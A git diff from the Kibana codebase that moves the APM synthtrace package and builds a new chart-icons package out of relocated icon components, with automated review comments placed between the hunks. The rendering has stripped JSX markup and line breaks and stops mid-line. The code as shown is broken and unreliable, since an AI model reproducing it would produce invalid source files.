diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster.ts
rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts
rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/index.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/index.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/index.ts
rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/index.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana.ts
rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts
rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts
rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stream_aggregator.ts b/packages/kbn-apm-synthtrace/src/lib/stream_aggregator.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stream_aggregator.ts
rename to packages/kbn-apm-synthtrace/src/lib/stream_aggregator.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/stream_processor.ts b/packages/kbn-apm-synthtrace/src/lib/stream_processor.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/stream_processor.ts
rename to packages/kbn-apm-synthtrace/src/lib/stream_processor.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/timerange.ts b/packages/kbn-apm-synthtrace/src/lib/timerange.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/timerange.ts
rename to packages/kbn-apm-synthtrace/src/lib/timerange.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/clean_write_targets.ts b/packages/kbn-apm-synthtrace/src/lib/utils/clean_write_targets.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/utils/clean_write_targets.ts
rename to packages/kbn-apm-synthtrace/src/lib/utils/clean_write_targets.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/create_logger.ts b/packages/kbn-apm-synthtrace/src/lib/utils/create_logger.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/utils/create_logger.ts
rename to packages/kbn-apm-synthtrace/src/lib/utils/create_logger.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/dedot.ts b/packages/kbn-apm-synthtrace/src/lib/utils/dedot.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/utils/dedot.ts
rename to packages/kbn-apm-synthtrace/src/lib/utils/dedot.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/generate_id.ts b/packages/kbn-apm-synthtrace/src/lib/utils/generate_id.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/utils/generate_id.ts
rename to packages/kbn-apm-synthtrace/src/lib/utils/generate_id.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts b/packages/kbn-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts
rename to packages/kbn-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/merge_iterable.ts b/packages/kbn-apm-synthtrace/src/lib/utils/merge_iterable.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/utils/merge_iterable.ts
rename to packages/kbn-apm-synthtrace/src/lib/utils/merge_iterable.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/agent_config.ts b/packages/kbn-apm-synthtrace/src/scenarios/agent_config.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/agent_config.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/agent_config.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/aws_lambda.ts b/packages/kbn-apm-synthtrace/src/scenarios/aws_lambda.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/aws_lambda.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/aws_lambda.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/kibana_stats.ts b/packages/kbn-apm-synthtrace/src/scenarios/kibana_stats.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/kibana_stats.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/kibana_stats.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/low_throughput.ts b/packages/kbn-apm-synthtrace/src/scenarios/low_throughput.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/low_throughput.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/low_throughput.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/many_services.ts b/packages/kbn-apm-synthtrace/src/scenarios/many_services.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/many_services.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/many_services.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/monitoring.ts b/packages/kbn-apm-synthtrace/src/scenarios/monitoring.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/monitoring.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/monitoring.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/simple_trace.ts b/packages/kbn-apm-synthtrace/src/scenarios/simple_trace.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/simple_trace.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/simple_trace.ts
diff --git a/packages/elastic-apm-synthtrace/src/scenarios/span_links.ts b/packages/kbn-apm-synthtrace/src/scenarios/span_links.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/scenarios/span_links.ts
rename to packages/kbn-apm-synthtrace/src/scenarios/span_links.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts b/packages/kbn-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts
rename to packages/kbn-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/event_dsl_behavior.test.ts b/packages/kbn-apm-synthtrace/src/test/event_dsl_behavior.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/event_dsl_behavior.test.ts
rename to packages/kbn-apm-synthtrace/src/test/event_dsl_behavior.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/rate_per_minute.test.ts b/packages/kbn-apm-synthtrace/src/test/rate_per_minute.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/rate_per_minute.test.ts
rename to packages/kbn-apm-synthtrace/src/test/rate_per_minute.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts
rename to packages/kbn-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts
rename to packages/kbn-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts
rename to packages/kbn-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts
rename to packages/kbn-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts
rename to packages/kbn-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts
rename to packages/kbn-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts
diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap b/packages/kbn-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap
rename to packages/kbn-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap
diff --git a/packages/elastic-apm-synthtrace/src/test/streams_merge.test.ts b/packages/kbn-apm-synthtrace/src/test/streams_merge.test.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/test/streams_merge.test.ts
rename to packages/kbn-apm-synthtrace/src/test/streams_merge.test.ts
diff --git a/packages/elastic-apm-synthtrace/tsconfig.json b/packages/kbn-apm-synthtrace/tsconfig.json
similarity index 100%
rename from packages/elastic-apm-synthtrace/tsconfig.json
rename to packages/kbn-apm-synthtrace/tsconfig.json
diff --git a/packages/kbn-babel-preset/node_preset.js b/packages/kbn-babel-preset/node_preset.js
index 295ea5d0d8e8b..8fb06d0c293ba 100644
--- a/packages/kbn-babel-preset/node_preset.js
+++ b/packages/kbn-babel-preset/node_preset.js
@@ -31,7 +31,7 @@ module.exports = (_, options = {}) => {
 // Because of that we should use for that value the same version we install
 // in the package.json in order to have the same polyfills between the environment
 // and the tests
- corejs: '3.21.1',
+ corejs: '3.23.5',
 bugfixes: true,
 ...(options['@babel/preset-env'] || {}),
diff --git a/packages/kbn-babel-preset/webpack_preset.js b/packages/kbn-babel-preset/webpack_preset.js
index 1f5a840f4f54d..02bc6270a8b00 100644
--- a/packages/kbn-babel-preset/webpack_preset.js
+++ b/packages/kbn-babel-preset/webpack_preset.js
@@ -18,7 +18,7 @@ module.exports = (_, options = {}) => {
 modules: false,
 // Please read the explanation for this
 // in node_preset.js
- corejs: '3.21.1',
+ corejs: '3.23.5',
 bugfixes: true,
 },
 ],
diff --git a/packages/kbn-shared-ux-services/src/services/http.ts b/packages/kbn-chart-icons/.storybook/main.js
similarity index 81%
rename from packages/kbn-shared-ux-services/src/services/http.ts
rename to packages/kbn-chart-icons/.storybook/main.js
index 024222092b7b1..8dc3c5d1518f4 100644
--- a/packages/kbn-shared-ux-services/src/services/http.ts
+++ b/packages/kbn-chart-icons/.storybook/main.js
@@ -6,6 +6,4 @@
 * Side Public License, v 1.
 */
-export interface SharedUxHttpService {
- addBasePath: (url: string) => string;
-}
+module.exports = require('@kbn/storybook').defaultConfig;
diff --git a/packages/kbn-shared-ux-services/BUILD.bazel b/packages/kbn-chart-icons/BUILD.bazel
old mode 100755
new mode 100644
similarity index 88%
rename from packages/kbn-shared-ux-services/BUILD.bazel
rename to packages/kbn-chart-icons/BUILD.bazel
index 1ed65b979a3e3..b3afcf893fd2e
--- a/packages/kbn-shared-ux-services/BUILD.bazel
+++ b/packages/kbn-chart-icons/BUILD.bazel
@@ -2,16 +2,17 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config")
 load("@build_bazel_rules_nodejs//:index.bzl", "js_library")
 load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project")
-PKG_DIRNAME = "kbn-shared-ux-services"
-PKG_REQUIRE_NAME = "@kbn/shared-ux-services"
+PKG_DIRNAME = "kbn-chart-icons"
+PKG_REQUIRE_NAME = "@kbn/chart-icons"
 SOURCE_FILES = glob(
 [
 "src/**/*.ts",
- "src/**/*.tsx",
+ "src/**/*.tsx"
 ],
 exclude = [
 "**/*.test.*",
+ "**/*.stories.*"
 ],
 )
@@ -37,8 +38,10 @@ NPM_MODULE_EXTRA_FILES = [
 # "@npm//name-of-package"
 # eg. "@npm//lodash"
 RUNTIME_DEPS = [
+ "//packages/kbn-ui-theme",
 "@npm//react",
- "@npm//rxjs",
+ "@npm//@elastic/eui",
+ "@npm//@emotion/css",
 ]
@@ -51,10 +54,12 @@ RUNTIME_DEPS = [
 #
 # References to NPM packages work the same as RUNTIME_DEPS
 TYPES_DEPS = [
+ "//packages/kbn-ui-theme:npm_module_types",
 "@npm//@types/node",
 "@npm//@types/jest",
 "@npm//@types/react",
- "@npm//rxjs",
+ "@npm//@elastic/eui",
+ "@npm//@emotion/css",
 ]
 jsts_transpiler(
@@ -70,6 +75,10 @@ jsts_transpiler(
 build_pkg_name = package_name(),
 root_input_dir = "src",
 web = True,
+ additional_args = [
+ "--copy-files",
+ "--quiet"
+ ],
 )
 ts_config(
diff --git a/packages/kbn-chart-icons/README.md b/packages/kbn-chart-icons/README.md
new file mode 100644
index 0000000000000..9e6f13e428e5a
--- /dev/null
+++ b/packages/kbn-chart-icons/README.md
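Review bot: The trailing commas dropped from the `SOURCE_FILES` glob (`"src/**/*.tsx"` and the new `"**/*.stories.*"`) and left off `"--quiet"` in `additional_args` are inconsistent with every other multi-line list in this file, where `RUNTIME_DEPS` and `TYPES_DEPS` keep them, and each later addition to these lists turns into a two-line diff; `"src/**/*.tsx",`, `"**/*.stories.*",` and `"--quiet",` would match the file's own style. The `--quiet` flag also suppresses babel's per-file output for this package's `jsts_transpiler` call, so if `--copy-files` ever stops carrying a non-TS asset into the output there is nothing in the build log to show it. A one-line comment on why both flags were added would help the next maintainer, e.g. `# --copy-files: ship the non-TS assets next to the transpiled output; --quiet: keep babel's per-file log out of CI`. That `--copy-files` exists for the svg assets described in the package README is my inference and should be confirmed.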
@@ -0,0 +1,5 @@
+# @kbn/chart-icons
+
+This package contains svg shared assets used in charts
+
+It can be removes when the [EuiIllustrations](https://github.com/elastic/eui/discussions/5546) initiative is shipped.
diff --git a/packages/shared-ux/storybook/mock/jest.config.js b/packages/kbn-chart-icons/jest.config.js
similarity index 82%
rename from packages/shared-ux/storybook/mock/jest.config.js
rename to packages/kbn-chart-icons/jest.config.js
index f29327c23ca15..771b3dd8ff9b8 100644
--- a/packages/shared-ux/storybook/mock/jest.config.js
+++ b/packages/kbn-chart-icons/jest.config.js
@@ -8,6 +8,6 @@
 module.exports = {
 preset: '@kbn/test/jest_node',
- rootDir: '../../../..',
- roots: ['/packages/shared-ux/storybook/mock'],
+ rootDir: '../..',
+ roots: ['/packages/kbn-chart-icons'],
 };
diff --git a/packages/kbn-shared-ux-services/package.json b/packages/kbn-chart-icons/package.json
old mode 100755
new mode 100644
similarity index 81%
rename from packages/kbn-shared-ux-services/package.json
rename to packages/kbn-chart-icons/package.json
index 7d7d999bf6961..c1f5912c1269e
--- a/packages/kbn-shared-ux-services/package.json
+++ b/packages/kbn-chart-icons/package.json
@@ -1,5 +1,5 @@
 {
- "name": "@kbn/shared-ux-services",
+ "name": "@kbn/chart-icons",
 "private": true,
 "version": "1.0.0",
 "main": "./target_node/index.js",
diff --git a/packages/kbn-chart-icons/src/__stories__/icons.stories.tsx b/packages/kbn-chart-icons/src/__stories__/icons.stories.tsx
new file mode 100644
index 0000000000000..a9910001eb923
--- /dev/null
+++ b/packages/kbn-chart-icons/src/__stories__/icons.stories.tsx
@@ -0,0 +1,221 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC, ComponentType } from 'react'; +import { EuiFlexItem, EuiFlexGroup, EuiEmptyPrompt, EuiForm, IconType } from '@elastic/eui'; +import { ComponentStory } from '@storybook/react'; + +import { + IconCircle, + IconTriangle, + EuiIconAxisBottom, + EuiIconAxisLeft, + EuiIconAxisRight, + EuiIconAxisTop, + IconChartArea, + IconChartAreaPercentage, + IconChartAreaStacked, + IconChartBar, + IconChartBarAnnotations, + IconChartBarHorizontal, + IconChartBarHorizontalPercentage, + IconChartBarHorizontalStacked, + IconChartBarPercentage, + IconChartBarReferenceLine, + IconChartBarStacked, + IconChartDatatable, + IconChartDonut, + IconChartLine, + IconChartMetric, + IconChartMixedXy, + IconChartMosaic, + IconChartPie, + IconChartTreemap, + IconChartWaffle, + DropIllustration, + GlobeIllustration, + EuiIconLegend, + IconRegionMap, + IconChartHeatmap, + IconChartHorizontalBullet, + IconChartVerticalBullet, +} from '..'; + +export default { + title: 'Chart Icons', + decorators: [(story: Function) => {story()}], +}; + +const IconsArray: Array<{ + title: string; + Component: ComponentType<{ title: string; titleId: string }>; +}> = [ + { + title: 'EuiIconAxisBottom', + Component: EuiIconAxisBottom, + }, + { + title: 'EuiIconAxisLeft', + Component: EuiIconAxisLeft, + }, + { + title: 'EuiIconAxisRight', + Component: EuiIconAxisRight, + }, + { + title: 'EuiIconAxisTop', + Component: EuiIconAxisTop, + }, + { + title: 'IconChartArea', + Component: IconChartArea, + }, + { + title: 'IconChartAreaPercentage', + Component: IconChartAreaPercentage, + }, + { + title: 'IconChartAreaStacked', + Component: 
IconChartAreaStacked, + }, + { + title: 'IconChartBar', + Component: IconChartBar, + }, + { + title: 'IconChartBarAnnotations', + Component: IconChartBarAnnotations, + }, + { + title: 'IconChartBarHorizontal', + Component: IconChartBarHorizontal, + }, + { + title: 'IconChartBarHorizontalPercentage', + Component: IconChartBarHorizontalPercentage, + }, + { + title: 'IconChartBarHorizontalStacked', + Component: IconChartBarHorizontalStacked, + }, + { + title: 'IconChartBarPercentage', + Component: IconChartBarPercentage, + }, + { + title: 'IconChartBarReferenceLine', + Component: IconChartBarReferenceLine, + }, + { + title: 'IconChartBarStacked', + Component: IconChartBarStacked, + }, + { + title: 'IconChartDatatable', + Component: IconChartDatatable, + }, + { + title: 'IconChartDonut', + Component: IconChartDonut, + }, + { + title: 'IconChartLine', + Component: IconChartLine, + }, + { + title: 'IconChartMetric', + Component: IconChartMetric, + }, + { + title: 'IconChartMixedXy', + Component: IconChartMixedXy, + }, + { + title: 'IconChartMosaic', + Component: IconChartMosaic, + }, + { + title: 'IconChartPie', + Component: IconChartPie, + }, + { + title: 'IconChartTreemap', + Component: IconChartTreemap, + }, + { + title: 'IconChartWaffle', + Component: IconChartWaffle, + }, + { + title: 'DropIllustration', + Component: DropIllustration, + }, + { + title: 'GlobeIllustration', + Component: GlobeIllustration, + }, + { + title: 'EuiIconLegend', + Component: EuiIconLegend, + }, + { + title: 'IconCircle', + Component: IconCircle, + }, + { + title: 'IconTriangle', + Component: IconTriangle, + }, + { + title: 'IconRegionMap', + Component: IconRegionMap, + }, + { + title: 'IconChartHeatmap', + Component: IconChartHeatmap, + }, + { + title: 'IconChartHorizontalBullet', + Component: IconChartHorizontalBullet, + }, + { + title: 'IconChartVerticalBullet', + Component: IconChartVerticalBullet, + }, +]; + +interface RootComponentProps { + icons: typeof IconsArray; +} + +function 
RootComponent(props: RootComponentProps) { + return ( + + {props.icons.map((i) => ( + + {i.title}} + titleSize={'s'} + /> + + ))} + + ); +} + +const Template: ComponentStory> = (args) => ; + +export const Default = Template.bind({}); + +Default.args = { + icons: IconsArray, +}; diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/circle.tsx b/packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx similarity index 80% rename from src/plugins/chart_expressions/expression_xy/public/icons/circle.tsx rename to packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx index 39bbe5cde74de..d3cb3789138f1 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/circle.tsx +++ b/packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx @@ -8,9 +8,10 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; +import { cx } from '@emotion/css'; +import { noFill } from '../common_styles'; -export const CircleIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconCircle = ({ title, titleId, ...props }: Omit) => ( diff --git a/src/plugins/vis_types/xy/public/config/index.ts b/packages/kbn-chart-icons/src/assets/annotation_icons/index.tsx similarity index 81% rename from src/plugins/vis_types/xy/public/config/index.ts rename to packages/kbn-chart-icons/src/assets/annotation_icons/index.tsx index b00d6aea3d356..a776717cfe3c5 100644 --- a/src/plugins/vis_types/xy/public/config/index.ts +++ b/packages/kbn-chart-icons/src/assets/annotation_icons/index.tsx @@ -6,5 +6,5 @@ * Side Public License, v 1. */ -export { getConfig } from './get_config'; -export { getAggId } from './get_agg_id'; +export { IconCircle } from './circle'; +export { IconTriangle } from './triangle'; 
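Review bot: `Function` is used as the decorator parameter type in `decorators: [(story: Function) => …]` near the top of the new stories file; `Function` is an untyped callable that disables checking of the `story()` call, so a concrete signature such as `(story: () => React.ReactNode)` (React is already imported) would keep the call checked. The rendered diff appears to have dropped JSX tags (for example `const Template: ComponentStory> = (args) => ;`), so the returned markup and the `ComponentStory` type argument cannot be verified here; if `FC` and `IconType` are not referenced in the stripped markup they are unused imports worth removing. As a naming nit, `IconsArray` is a plain array constant rather than a component, so `iconsArray` (or `ICONS`) would follow the usual camelCase/CONSTANT_CASE convention, and the `icons: typeof IconsArray` prop type would follow it.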
diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/triangle.tsx b/packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/triangle.tsx rename to packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx index 8ffb8c490d9a4..227dc84335821 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/triangle.tsx +++ b/packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx @@ -8,9 +8,10 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; +import { cx } from '@emotion/css'; +import { noFill } from '../common_styles'; -export const TriangleIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconTriangle = ({ title, titleId, ...props }: Omit) => ( ); diff --git a/x-pack/plugins/lens/public/assets/axis_bottom.tsx b/packages/kbn-chart-icons/src/assets/axis_bottom.tsx similarity index 82% rename from x-pack/plugins/lens/public/assets/axis_bottom.tsx rename to packages/kbn-chart-icons/src/assets/axis_bottom.tsx index 309d41bf24221..c2ad925a962de 100644 --- a/x-pack/plugins/lens/public/assets/axis_bottom.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_bottom.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisBottom = ({ title, 
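Review bot: The license header of the moved `axis_bottom.tsx` changes from the Elastic License 2.0-only text to the dual Elastic License 2.0 / SSPL v1 text as the file leaves `x-pack/`; that is a relicensing of the moved code rather than a cosmetic edit, so it is worth a sentence in the PR description confirming it is intended, and the same applies to the axis_left, axis_right, axis_top and `chart_*` hunks that follow. The files moved from `src/plugins/…` appear to already carry the dual header and only gain the `colors` import. The `EuiIconAxisBottom` definition continues outside the hunk.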
diff --git a/x-pack/plugins/lens/public/assets/axis_left.tsx b/packages/kbn-chart-icons/src/assets/axis_left.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/axis_left.tsx rename to packages/kbn-chart-icons/src/assets/axis_left.tsx index 9a39a2f43a74d..e4d4361ecfe75 100644 --- a/x-pack/plugins/lens/public/assets/axis_left.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_left.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisLeft = ({ title, diff --git a/x-pack/plugins/lens/public/assets/axis_right.tsx b/packages/kbn-chart-icons/src/assets/axis_right.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/axis_right.tsx rename to packages/kbn-chart-icons/src/assets/axis_right.tsx index 4db6fc06d82fa..8316fbe713388 100644 --- a/x-pack/plugins/lens/public/assets/axis_right.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_right.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisRight = ({ title, 
diff --git a/x-pack/plugins/lens/public/assets/axis_top.tsx b/packages/kbn-chart-icons/src/assets/axis_top.tsx similarity index 92% rename from x-pack/plugins/lens/public/assets/axis_top.tsx rename to packages/kbn-chart-icons/src/assets/axis_top.tsx index 2c3dc0744c068..d78dfcc113aad 100644 --- a/x-pack/plugins/lens/public/assets/axis_top.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_top.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisTop = ({ title, diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/area.tsx b/packages/kbn-chart-icons/src/assets/chart_area.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/area.tsx rename to packages/kbn-chart-icons/src/assets/chart_area.tsx index 010ffaf1fb7ec..a09a9cab956ad 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/area.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_area.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const AreaIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartArea = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); 
diff --git a/x-pack/plugins/lens/public/assets/chart_area_percentage.tsx b/packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx similarity index 82% rename from x-pack/plugins/lens/public/assets/chart_area_percentage.tsx rename to packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx index 910d5dc817289..07917b1bcabc2 100644 --- a/x-pack/plugins/lens/public/assets/chart_area_percentage.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartAreaPercentage = ({ +export const IconChartAreaPercentage = ({ title, titleId, ...props @@ -25,11 +27,11 @@ export const LensIconChartAreaPercentage = ({ {title ? {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_area_stacked.tsx b/packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx similarity index 79% rename from x-pack/plugins/lens/public/assets/chart_area_stacked.tsx rename to 